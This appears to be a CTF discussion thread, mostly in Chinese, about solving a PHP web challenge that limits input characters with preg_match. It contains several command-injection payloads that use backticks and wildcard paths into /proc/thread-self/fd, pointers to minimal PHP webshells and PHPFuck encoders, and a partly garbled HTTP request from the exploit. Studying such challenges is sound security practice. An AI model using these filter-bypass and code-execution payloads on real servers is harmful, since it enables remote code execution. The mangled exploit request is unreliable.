Stress Release Service Stress Release Service: 1 2 3 4 5 6 7 8 9 10 11 12 Chall name: - Stress Release Service Category: - Misc / Web Author: - tsug0d Description: For a better New Year, we are introducing a service that can help you reduce stress: <http://192.53.173.71:8080> . As our service is only available during the New Year, we are also providing you with a code for later use in material section.
StressReleaseService__give.zip
It is using preg_match to validate.
为啥是misc题啊
限制7个字符长度,可能需要点脑洞吧(
tiniest php webshell?
https://www.pentestpartners.com/security-blog/the-tiniest-php-system-shell-ever/
抽象,反引号或者想办法传参?
CTFshow_rce极限大挑战
他不限制在7个字符可以看下面这张图
相同的字符他会认为是一个
我这里最短的自增是11位字符 师傅们可以试试异或
https://github.com/splitline/PHPFuck
https://b-viguier.github.io/PhpFk/
他不能超过300 phpfunck太容易超过了
看看能不能eval另一个get参数
我有个想法 他既然给了我们secret是不是构造什么 文件包含 去读取这个secret.php啊
试了试,都不太行呀
1 2 3 4 5 6 7 # payload = "'.`. /???/?????????`.'" # payload = "'.`. /???/???/????/?????.???`.'" # /proc/thread-self/fd/5 payload = "'.`ls -l /????/??????-????/??/??`.'" payload = "'.`. /proc/thread-self/??/??`.'" # payload = "'.`echo /????/??????-????/????????? /???/???/????/??????.???`.'" # payload = "'.`/????/??????-????/????????? /???/???/????/??????.???`.'"
我感觉自增是不可能了
$_[];.()+
最少都需要9+
限制了
这道题是独享还是共享 docker吗
出了
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 POST /index.php HTTP /1.1 Host : 127.0 .0 .1 :1003 User -Agent : curl/8.1 .2 Accept : ** Cookie : PHPSESSID =123456789012345678901234567890123456789012345678
开两个intruder跑就行
